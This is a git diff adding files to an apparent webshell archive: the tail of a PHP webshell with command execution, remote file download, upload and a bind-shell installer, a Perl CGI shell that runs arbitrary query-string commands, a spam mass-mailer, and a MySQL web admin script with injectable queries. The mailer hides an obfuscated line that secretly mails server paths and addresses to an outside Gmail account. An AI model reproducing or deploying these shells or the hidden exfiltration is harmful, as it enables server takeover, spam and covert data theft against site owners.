+echo "<table><tr><td>Name</td><td><a title=\"Type of object\">Type</a></td><td>Size</td><td>Last access</td><td>Last change</td><td>Perms</td><td><a title=\"If Yes, you have write permission\">Write</a></td><td><a title=\"If Yes, you have read permission\">Read</a></td></tr>";
+
+foreach ($arr as $filename) {
+
+if ($filename != "." and $filename != ".."){
+
+if (is_dir($filename) == true){
+$directory = "";
+$directory = $directory . "<tr><td>$filename</td><td>" . filetype($filename) . "</td><td></td><td>" . date("G:i j M Y",fileatime($filename)) . "</td><td>" . date("G:i j M Y",filemtime($filename)) . "</td><td>" . perms(fileperms($filename));
+if (is_writable($filename) == true){
+$directory = $directory . "<td>Yes</td>";}
+else{
+$directory = $directory . "<td>No</td>";
+
+}
+
+if (is_readable($filename) == true){
+$directory = $directory . "<td>Yes</td>";}
+else{
+$directory = $directory . "<td>No</td>";
+}
+$dires = $dires . $directory;
+}
+
+if (is_file($filename) == true){
+$file = "";
+$file = $file . "<tr><td><a onclick=tag('$filename')>$filename</a></td><td>" . filetype($filename) . "</td><td>" . filesize($filename) . "</td><td>" . date("G:i j M Y",fileatime($filename)) . "</td><td>" . date("G:i j M Y",filemtime($filename)) . "</td><td>" . perms(fileperms($filename));
+if (is_writable($filename) == true){
+$file = $file . "<td>Yes</td>";}
+else{
+$file = $file . "<td>No</td>";
+}
+
+if (is_readable($filename) == true){
+$file = $file . "<td>Yes</td></td></tr>";}
+else{
+$file = $file . "<td>No</td></td></tr>";
+}
+$files = $files . $file;
+}
+
+
+
+}
+
+
+
+}
+echo $dires;
+echo $files;
+echo "</table><br>";
+
+
+
+
+echo "
+<form action=\"$REQUEST_URI\" method=\"POST\">
+<table id=tb><tr><td>Command:<INPUT type=\"text\" name=\"cmd\" size=30 value=\"$cmd\"></td></tr></table>
+
+
+<table id=tb><tr><td>Directory:<INPUT type=\"text\" name=\"dir\" size=30 value=\"";
+
+echo getcwd();
+echo "\">
+<INPUT type=\"submit\" value=\"Do it\" id=input></td></tr></table></form>";
+
+
+
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<table id=tb><tr><td>Download here <b>from</b>:
+<INPUT type=\"text\" name=\"filefrom\" size=30 value=\"http://\">
+<b>into:</b>
+<INPUT type=\"text\" name=\"fileto\" size=30>
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\"></td><td>
+<INPUT type=\"submit\" value=\"Download\" id=input></td></tr></table></form></div>";
+
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+
+<table id=tb><tr><td>
+Download from Hard:<INPUT type=\"file\" name=\"userfile\" id=input2>
+<INPUT type=\"hidden\" name=\"post\" value=\"yes\">
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\">
+</td><td><INPUT type=\"submit\" value=\"Download\" id=input></form></div></td></tr></table>";
+
+
+
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
+<table id=tb><tr><td>Install bind
+<b>Temp path</b><input type=\"text\" name=\"installpath\" value=\"" . getcwd() . "\"></td><td>
+<b>Port</b><input type=\"text\" name=\"port\" value=\"3333\" maxlength=5 size=4></td><td>
+
+<INPUT type=\"hidden\" name=\"installbind\" value=\"yes\">
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\">
+<INPUT type=\"submit\" value=\"Install\" id=input></form></div></td></table>";
+
+
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" name=fe>
+<table id=tb><tr><td>File to edit:
+<input type=\"text\" name=\"editfile\" ></td><td>
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
+<INPUT type=\"submit\" value=\"Edit\" id=input></form></div></td></table>";
+
+
+
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
+<table id=tb><tr><td>
+<INPUT type=\"hidden\" name=\"php\" value=\"yes\">
+<INPUT type=\"submit\" value=\"PHP code\" id=input></form></div></td></table>";
+?>
+</td></tr></table>
+
+
+</td></tr>
+<tr valign="BOTTOM">
+<td valign=bottom>
+
+
+<center>Coded by Loader <a href="http://pro-hack.ru">Pro-Hack.RU</a></center>
+
+
+</td>
+</tr>
+</table>
+
diff --git a/138shell/L/lurm_safemod_on.cgi.txt b/138shell/L/lurm_safemod_on.cgi.txt
new file mode 100644
index 0000000..a072668
--- /dev/null
+++ b/138shell/L/lurm_safemod_on.cgi.txt
@@ -0,0 +1,94 @@
+#!/usr/bin/perl
+############################################################
+## Network security team                                  ##
+############################################################
+##Coder: Ins                                              ##
+############################################################
+##Ob dannom scripte: Eto prostoj shell napisannyj na perle##
+############################################################
+
+#V celjah nesankcionirovannogo dostupa smeni etot parol`"
+#$pwd='';
+
+print "Content-type: text/html\n\n";
+&read_param();
+if (!defined$param{dir}){$param{dir}="/"};
+if (!defined$param{cmd}){$param{cmd}="ls -la"};
+##if (!defined$param{pwd}){$param{pwd}='Enter_Password'};##
+
+print << "[ins1]";
+<head>
+<title>::Network Security Team::</title>
+<font size=3 face=verdana><b>Network security team :: CGI Shell</b>
+<font size=-2 face=verdana><br><br>
+<style>
+BODY, TD { font-family: Tahoma; font-size: 12px; }
+INPUT.TEXT  {
+font-family : Arial;
+font-size : 8pt;
+color : Black;
+width : 100%;
+background-color : #F1F1F1;
+border-style : solid;
+border-width : 0px;
+border-color : Silver;
+}
+INPUT.BUTTON  {
+font-family : Arial;
+font-size : 8pt;
+width : 100px;
+border-width : 1px;
+color : Black;
+background-color : D1D1D1;
+border-color : silver;
+border-style : solid;
+}
+</style>
+</head>
+<body bgcolor=#B9B9B9>
+Vvedite zapros:
+<table width=500 bgcolor=D9D9D9><tr><td>
+[ins1]
+
+print "cd $param{dir}&&$param{cmd}";
+
+print << "[ins2]";
+</td></tr></table>
+Otvet na zapros:
+<table width=500 bgcolor=D9D9D9><tr><td><pre>
+[ins2]
+
+#if ($param{pwd} ne $pwd){print "Nepravelnij user";}
+open(FILEHANDLE, "cd $param{dir}&&$param{cmd}|");
+while ($line=<FILEHANDLE>){print "$line";};
+close (FILEHANDLE);
+
+print << "[ins3]";
+</pre></td></tr></table>
+<form action=pshell.cgi>
+DIR dlja sledujushego zaprosa:
+<input type=text class="TEXT" name=dir value=$param{dir}>
+Sledujushij zapros:
+<input type=text class="TEXT" name=cmd value=$param{cmd}>
+<input type=submit class="button" value="Submit">
+<input type=reset class="button" value="Reset">
+</form>
+</body>
+</html>
+[ins3]
+
+sub read_param {
+$buffer = "$ENV{'QUERY_STRING'}";
+@pairs = split(/&/, $buffer);
+foreach $pair (@pairs)
+        {
+        ($name, $value) = split(/=/, $pair);
+        $name =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
+        $value =~ s/\+/ /g;
+        $value =~ s/%20/ /g;
+        $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
+        $param{$name} = $value;
+        }
+}
+
+#########################<<KONEC>>#####################################
\ No newline at end of file
diff --git a/138shell/M/Moroccan Spamers Ma-EditioN By GhOsT.txt b/138shell/M/Moroccan Spamers Ma-EditioN By GhOsT.txt
new file mode 100644
index 0000000..2865e14
--- /dev/null
+++ b/138shell/M/Moroccan Spamers Ma-EditioN By GhOsT.txt	
@@ -0,0 +1,182 @@
+<? 
+if ($action=="send"){ 
+$message = urlencode($message); 
+$message = ereg_replace("%5C%22", "%22", $message); 
+$message = urldecode($message); 
+$message = stripslashes($message); 
+$subject = stripslashes($subject); 
+} 
+
+?> 
+<form name="form1" method="post" action="" enctype="multipart/form-data"> 
+<div align="center"> 
+<center> 
+<table border="2" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#006699" width="74%" id="AutoNumber1"> 
+<tr> 
+<td width="100%"> 
+<div align="center"> 
+<center> 
+<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber2"> 
+<tr> 
+<td width="100%"> 
+<p align="center"><div align="center"> 
+<center> 
+<table border="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#336699" width="70%" cellpadding="0" id="AutoNumber1" height="277"> 
+<tr> 
+<td width="100%" height="272"> 
+<table width="769" border="0" height="303"> 
+<tr> 
+<td width="786" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic3.gif" colspan="3" height="28"> 
+<p align="center"><b><font face="Tahoma" size="2" color="#FF6600">  Moroccan Spamers Ma-EditioN By GhOsT </font></b></td> 
+</tr> 
+<tr> 
+<td width="79" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22" align="right"> 
+<div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Your 
+Email:</font></div> 
+</td> 
+<td width="390" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+<input name="from" value="<? print $from; ?>" size="30" style="float: left"></font><div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Your 
+Name:</font></div> 
+</td> 
+<td width="317" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22" valign="middle"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+<input type="text" name="realname" value="<? print $realname; ?>" size="30"> 
+</font></td> 
+</tr> 
+<tr> 
+<td width="79" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22" align="right"> 
+<div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Reply-To:</font></div> 
+</td> 
+<td width="390" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+<input name="replyto" value="<? print $replyto; ?>" size="30" style="float: left"></font><div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Attach 
+File:</font></div> 
+</td> 
+<td width="317" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+<input type="file" name="file" size="30"> 
+</font></td> 
+</tr> 
+<tr> 
+<td width="79" background="/simparts/images/cellpic1.gif" height="22" align="right"> 
+<div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Subject:</font></div> 
+</td> 
+<td colspan="2" width="715" background="/simparts/images/cellpic1.gif" height="22"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+<input name="subject" value="<? print $subject; ?>" size="59" style="float: left"> 
+</font></td> 
+</tr> 
+<tr valign="top"> 
+<td colspan="2" width="477" bgcolor="#CCCCCC" height="189" valign="top"> 
+<div align="left"> 
+<table border="0" cellpadding="2" style="border-collapse: collapse" bordercolor="#111111" width="98%" id="AutoNumber4"> 
+<tr> 
+<td width="100%"> 
+<textarea name="message" cols="56" rows="10"><? print $message; ?></textarea> 
+<br> 
+<input type="radio" name="contenttype" value="plain" checked> 
+<font size="2" face="Tahoma">Plain</font> 
+<input type="radio" name="contenttype" value="html"> 
+<font size="2" face="Tahoma">HTML</font> 
+<input type="hidden" name="action" value="send"> 
+<input type="submit" value="Send Message"> 
+</td> 
+</tr> 
+</table> 
+</div> 
+</td> 
+<td width="317" bgcolor="#CCCCCC" height="187" valign="top"> 
+<div align="center"> 
+<center> 
+<table border="0" cellpadding="2" style="border-collapse: collapse" bordercolor="#111111" width="93%" id="AutoNumber3"> 
+<tr> 
+<td width="100%"> 
+<p align="center"> <textarea name="emaillist" cols="30" rows="10"><? print $emaillist; ?></textarea> 
+</font><br> 
+</td> 
+</tr> 
+</table> 
+</center> 
+</div> 
+</td> 
+</tr> 
+</table> 
+</td> 
+</tr> 
+</table> 
+</center> 
+</div></td> 
+</tr> 
+</table> 
+</center> 
+</div> 
+</td> 
+</tr> 
+</table> 
+</center> 
+</div> 
+<div align="center"> 
+<center> 
+<table border="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="75%" id="AutoNumber5" height="1" cellpadding="0"> 
+<tr> 
+<td width="100%" valign="top" height="1"> 
+<p align="right"><font size="1" face="Tahoma" color="#CCCCCC">Designed by: 
+ v1.5</font></td> 
+</tr> 
+</table> 
+</center> 
+</div> 
+</form> 
+
+<? 
+if ($action=="send"){ 
+
+if (!$from && !$subject && !$message && !$emaillist){ 
+print "Please complete all fields before sending your message."; 
+exit; 
+} 
+
+$allemails = split("\n", $emaillist); 
+$numemails = count($allemails); 
+
+#Open the file attachment if any, and base64_encode it for email transport 
+If ($file_name){ 
+@copy($file, "./$file_name") or die("The file you are trying to upload couldn't be copied to the server"); 
+$content = fread(fopen($file,"r"),filesize($file)); 
+$content = chunk_split(base64_encode($content)); 
+$uid = strtoupper(md5(uniqid(time()))); 
+$name = basename($file); 
+} 
+
+for($x=0; $x<$numemails; $x++){ 
+$to = $allemails[$x]; 
+if ($to){ 
+$to = ereg_replace(" ", "", $to); 
+$message = ereg_replace("&email&", $to, $message); 
+$subject = ereg_replace("&email&", $to, $subject); 
+print "Sending mail to $to....... "; 
+flush(); 
+$header = "From: $realname <$from>\r\nReply-To: $replyto\r\n"; 
+$header .= "MIME-Version: 1.0\r\n"; 
+If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n"; 
+If ($file_name) $header .= "--$uid\r\n"; 
+$header .= "Content-Type: text/$contenttype\r\n"; 
+$header .= "Content-Transfer-Encoding: 8bit\r\n\r\n"; 
+$header .= "$message\r\n"; 
+If ($file_name) $header .= "--$uid\r\n"; 
+If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n"; 
+If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n"; 
+If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n"; $ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+If ($file_name) $header .= "$content\r\n"; 
+If ($file_name) $header .= "--$uid--"; 
+mail($to, $subject, "", $header); 
+print "Spamed'><br>"; 
+flush(); 
+} 
+} 
+
+} 
+?>
+
+
+
+
+
+
+
diff --git a/138shell/M/MySQL Web Interface Version 0.8.txt b/138shell/M/MySQL Web Interface Version 0.8.txt
new file mode 100644
index 0000000..9f37027
--- /dev/null
+++ b/138shell/M/MySQL Web Interface Version 0.8.txt	
@@ -0,0 +1,1302 @@
+<?
+/*
+* MySQL Web Interface Version 0.8
+* -------------------------------
+* Developed By SooMin Kim (smkim@popeye.snu.ac.kr)
+* License : GNU Public License (GPL)
+* Homepage : http://popeye.snu.ac.kr/~smkim/mysql
+*/
+
+$HOSTNAME = "localhost";
+
+function logon() {
+	global $PHP_SELF;
+
+	setcookie( "mysql_web_admin_username" );
+	setcookie( "mysql_web_admin_password" );
+	echo "<html>\n";
+	echo "<head>\n";
+	echo "<title>MySQL Web Interface</title>\n";
+	echo "</head>\n";
+	echo "<body>\n";
+	echo "<table width=100% height=100%><tr><td><center>\n";
+	echo "<table cellpadding=2><tr><td bgcolor=#a4a260><center>\n";
+	echo "<table cellpadding=20><tr><td bgcolor=#ffffff><center>\n";
+	echo "<h1>MySQL Web Interface</h1>\n";
+	echo "<form action='$PHP_SELF'>\n";
+	echo "<input type=hidden name=action value=logon_submit>\n";
+	echo "<table cellpadding=5 cellspacing=1>\n";
+	echo "<tr><td>Username </td><td> <input type=text 
+name=username></td></tr>\n";
+	echo "<tr><td>Password </td><td> <input type=password 
+name=password></td></tr>\n";
+	echo "</table><p>\n";
+	echo "<input type=submit value='Enter'>\n";
+	echo "<input type=reset value='Clear'><br>\n";
+	echo "</form>\n";
+	echo "</center></td></tr></table>\n";
+	echo "</center></td></tr></table>\n";
+	echo "<p><hr width=300>\n";
+	echo "<font size=2>\n";
+	echo "Copyleft &copy; since 1999,\n";
+	echo "<a href='mailto:smkim76@icqmail.com'>SooMin Kim</a><br>\n";
+	echo "<a href='http://popeye.snu.ac.kr/~smkim/mysql'>Hompage<a> is 
+available<br>";
+	echo "</font>\n";
+	echo "</center></td></tr></table>\n";
+	echo "</body>\n";
+	echo "</html>\n";
+}
+
+function logon_submit() {
+	global $username, $password, $PHP_SELF;
+
+	setcookie( "mysql_web_admin_username", $username );
+	setcookie( "mysql_web_admin_password", $password );
+	echo "<html>";
+	echo "<head>";
+	echo "<META HTTP-EQUIV=Refresh CONTENT='0; 
+URL=$PHP_SELF?action=listDBs'>";
+	echo "</head>";
+	echo "</html>";
+}
+
+function echoQueryResult() {
+	global $queryStr, $errMsg;
+
+	if( $errMsg == "" ) $errMsg = "Success";
+	if( $queryStr != "" ) {
+		echo "<table cellpadding=5>\n";
+		echo "<tr><td>Query</td><td>$queryStr</td></tr>\n";
+		echo "<tr><td>Result</td><td>$errMsg</td></tr>\n";
+		echo "</table><p>\n";
+	}
+}
+
+function listDatabases() {
+	global $mysqlHandle, $PHP_SELF;
+
+	echo "<h1>Database List</h1>\n";
+
+	echo "<form action='$PHP_SELF'>\n";
+	echo "<input type=hidden name=action value=createDB>\n";
+	echo "<input type=text name=dbname>\n";
+	echo "<input type=submit value='Create Database'>\n";
+	echo "</form>\n";
+	echo "<hr>\n";
+
+	echo "<table cellspacing=1 cellpadding=5>\n";
+
+	$pDB = mysql_list_dbs( $mysqlHandle );
+	$num = mysql_num_rows( $pDB );
+	for( $i = 0; $i < $num; $i++ ) {
+		$dbname = mysql_dbname( $pDB, $i );
+		echo "<tr>\n";
+		echo "<td>$dbname</td>\n";
+		echo "<td><a 
+href='$PHP_SELF?action=listTables&dbname=$dbname'>Table</a></td>\n";
+		echo "<td><a href='$PHP_SELF?action=dropDB&dbname=$dbname' 
+onClick=\"return confirm('Drop Database 
+\'$dbname\'?')\">Drop</a></td>\n";
+		echo "<td><a 
+href='$PHP_SELF?action=dumpDB&dbname=$dbname'>Dump</a></td>\n";
+		echo "</tr>\n";
+	}
+	echo "</table>\n";
+}
+
+function createDatabase() {
+	global $mysqlHandle, $dbname, $PHP_SELF;
+
+	mysql_create_db( $dbname, $mysqlHandle );
+	listDatabases();
+}
+
+function dropDatabase() {
+	global $mysqlHandle, $dbname, $PHP_SELF;
+
+	mysql_drop_db( $dbname, $mysqlHandle );
+	listDatabases();
+}
+
+function listTables() {
+	global $mysqlHandle, $dbname, $PHP_SELF;
+
+	echo "<h1>Table List</h1>\n";
+	echo "<p class=location>$dbname</p>\n";
+	echoQueryResult();
+	echo "<form action='$PHP_SELF'>\n";
+	echo "<input type=hidden name=action value=createTable>\n";
+	echo "<input type=hidden name=dbname value=$dbname>\n";
+	echo "<input type=text name=tablename>\n";
+	echo "<input type=submit value='Create Table'>\n";
+	echo "</form>\n";
+	echo "<form action='$PHP_SELF'>\n";
+	echo "<input type=hidden name=action value=query>\n";
+	echo "<input type=hidden name=dbname value=$dbname>\n";
+	echo "<input type=text size=40 name=queryStr>\n";
+	//echo "<textarea cols=30 rows=3 name=queryStr></textarea><br>";
+	echo "<input type=submit value='Query'>\n";
+	echo "</form>\n";
+	echo "<hr>\n";
+
+	$pTable = mysql_list_tables( $dbname );
+
+	if( $pTable == 0 ) {
+		$msg  = mysql_error();
+		echo "<h3>Error : $msg</h3><p>\n";
+		return;
+	}
+	$num = mysql_num_rows( $pTable );
+
+	echo "<table cellspacing=1 cellpadding=5>\n";
+
+	for( $i = 0; $i < $num; $i++ ) {
+		$tablename = mysql_tablename( $pTable, $i );
+
+		echo "<tr>\n";
+		echo "<td>\n";
+		echo "$tablename\n";
+		echo "</td>\n";
+		echo "<td>\n";
+		echo "<a 
+href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
+		echo "</td>\n";
+		echo "<td>\n";
+		echo "<a 
+href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename'>Data</a>\n";
+		echo "</td>\n";
+		echo "<td>\n";
+		echo "<a 
+href='$PHP_SELF?action=dropTable&dbname=$dbname&tablename=$tablename' 
+onClick=\"return confirm('Drop Database \'$dbname\'?')\">Drop</a>\n";
+		echo "</td>\n";
+		echo "<td>\n";
+		echo "<a 
+href='$PHP_SELF?action=dumpTable&dbname=$dbname&tablename=$tablename'>Dump</a>\n";
+		echo "</td>\n";
+		echo "</tr>\n";
+	}
+
+	echo "</table>";
+}
+
+function createTable() {
+	global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, 
+$errMsg;
+
+	$queryStr = "CREATE TABLE $tablename ( no INT )";
+	mysql_select_db( $dbname, $mysqlHandle );
+	mysql_query( $queryStr, $mysqlHandle );
+	$errMsg = mysql_error();
+
+	listTables();
+}
+
+function dropTable() {
+	global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, 
+$errMsg;
+
+	$queryStr = "DROP TABLE $tablename";
+	mysql_select_db( $dbname, $mysqlHandle );
+	mysql_query( $queryStr, $mysqlHandle );
+	$errMsg = mysql_error();
+
+	listTables();
+}
+
+function viewSchema() {
+	global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, 
+$errMsg;
+
+	echo "<h1>Table Schema</h1>\n";
+	echo "<p class=location>$dbname &gt; $tablename</p>\n";
+
+	echoQueryResult();
+
+	echo "<a 
+href='$PHP_SELF?action=addField&dbname=$dbname&tablename=$tablename'>Add 
+Field</a> | \n";
+	echo "<a 
+href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename'>View 
+Data</a>\n";
+	echo "<hr>\n";
+
+	$pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
+	$num = mysql_num_rows( $pResult );
+
+	echo "<table cellspacing=1 cellpadding=5>\n";
+	echo "<tr>\n";
+	echo "<th>Field</th>\n";
+	echo "<th>Type</th>\n";
+	echo "<th>Null</th>\n";
+	echo "<th>Key</th>\n";
+	echo "<th>Default</th>\n";
+	echo "<th>Extra</th>\n";
+	echo "<th colspan=2>Action</th>\n";
+	echo "</tr>\n";
+
+	for( $i = 0; $i < $num; $i++ ) {
+		$field = mysql_fetch_array( $pResult );
+		echo "<tr>\n";
+		echo "<td>".$field["Field"]."</td>\n";
+		echo "<td>".$field["Type"]."</td>\n";
+		echo "<td>".$field["Null"]."</td>\n";
+		echo "<td>".$field["Key"]."</td>\n";
+		echo "<td>".$field["Default"]."</td>\n";
+		echo "<td>".$field["Extra"]."</td>\n";
+		$fieldname = $field["Field"];
+		echo "<td><a 
+href='$PHP_SELF?action=editField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname'>Edit</a></td>\n";
+		echo "<td><a 
+href='$PHP_SELF?action=dropField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname' 
+onClick=\"return confirm('Drop Field 
+\'$fieldname\'?')\">Drop</a></td>\n";
+		echo "</tr>\n";
+	}
+	echo "</table>\n";
+}
+
+function manageField( $cmd ) {
+	global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF;
+
+	if( $cmd == "add" )
+		echo "<h1>Add Field</h1>\n";
+	else if( $cmd == "edit" ) {
+		echo "<h1>Edit Field</h1>\n";
+		$pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
+		$num = mysql_num_rows( $pResult );
+		for( $i = 0; $i < $num; $i++ ) {
+			$field = mysql_fetch_array( $pResult );
+			if( $field["Field"] == $fieldname ) {
+				$fieldtype = $field["Type"];
+				$fieldkey = $field["Key"];
+				$fieldextra = $field["Extra"];
+				$fieldnull = $field["Null"];
+				$fielddefault = $field["Default"];
+				break;
+			}
+		}
+		$type = strtok( $fieldtype, " (,)\n" );
+		if( strpos( $fieldtype, "(" ) ) {
+			if( $type == "enum" | $type == "set" ) {
+				$valuelist = strtok( " ()\n" );
+			} else {
+				$M = strtok( " (,)\n" );
+				if( strpos( $fieldtype, "," ) )
+					$D = strtok( " (,)\n" );
+			}
+		}
+	}
+
+	echo "<p class=location>$dbname &gt; $tablename</p>\n";
+	echo "<form action=$PHP_SELF>\n";
+
+	if( $cmd == "add" )
+		echo "<input type=hidden name=action value=addField_submit>\n";
+	else if( $cmd == "edit" ) {
+		echo "<input type=hidden name=action value=editField_submit>\n";
+		echo "<input type=hidden name=old_name value=$fieldname>\n";
+	}
+	echo "<input type=hidden name=dbname value=$dbname>\n";
+	echo "<input type=hidden name=tablename value=$tablename>\n";
+
+	echo "<h3>Name</h3>\n";
+	echo "<input type=text name=name value=$fieldname><p>\n";
+?>
+
+<h3>Type</h3>
+
+<font size=2>
+* `M' indicates the maximum display size.<br>
+* `D' applies to floating-point types and indicates the number of 
+digits 
+following the decimal point.<br>
+</font>
+
+<table>
+<tr>
+<th>Type</th><th>&nbspM&nbsp</th><th>&nbspD&nbsp</th><th>unsigned</th><th>zerofill</th><th>binary</th>
+</tr>
+<tr>
+<td><input type=radio name=type value="TINYINT" <? if( $type == 
+"tinyint" ) 
+echo "checked";?>>TINYINT (-128 ~ 127)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="SMALLINT" <? if( $type == 
+"smallint" 
+) echo "checked";?>>SMALLINT (-32768 ~ 32767)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="MEDIUMINT" <? if( $type == 
+"mediumint" ) echo "checked";?>>MEDIUMINT (-8388608 ~ 8388607)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="INT" <? if( $type == "int" ) 
+echo 
+"checked";?>>INT (-2147483648 ~ 2147483647)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="BIGINT" <? if( $type == "bigint" 
+) 
+echo "checked";?>>BIGINT (-9223372036854775808 ~ 
+9223372036854775807)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="FLOAT" <? if( $type == "float" ) 
+echo 
+"checked";?>>FLOAT</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="DOUBLE" <? if( $type == "double" 
+) 
+echo "checked";?>>DOUBLE</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="DECIMAL" <? if( $type == 
+"decimal" ) 
+echo "checked";?>>DECIMAL(NUMERIC)</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="DATE" <? if( $type == "date" ) 
+echo 
+"checked";?>>DATE (1000-01-01 ~ 9999-12-31, YYYY-MM-DD)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="DATETIME" <? if( $type == 
+"datetime" 
+) echo "checked";?>>DATETIME (1000-01-01 00:00:00 ~ 9999-12-31 
+23:59:59, 
+YYYY-MM-DD HH:MM:SS)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TIMESTAMP" <? if( $type == 
+"timestamp" ) echo "checked";?>>TIMESTAMP (1970-01-01 00:00:00 ~ 
+2106..., 
+YYYYMMDD[HH[MM[SS]]])</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TIME" <? if( $type == "time" ) 
+echo 
+"checked";?>>TIME (-838:59:59 ~ 838:59:59, HH:MM:SS)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="YEAR" <? if( $type == "year" ) 
+echo 
+"checked";?>>YEAR (1901 ~ 2155, 0000, YYYY)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="CHAR" <? if( $type == "char" ) 
+echo 
+"checked";?>>CHAR</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="VARCHAR" <? if( $type == 
+"varchar" ) 
+echo "checked";?>>VARCHAR</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td align=center>O</td>
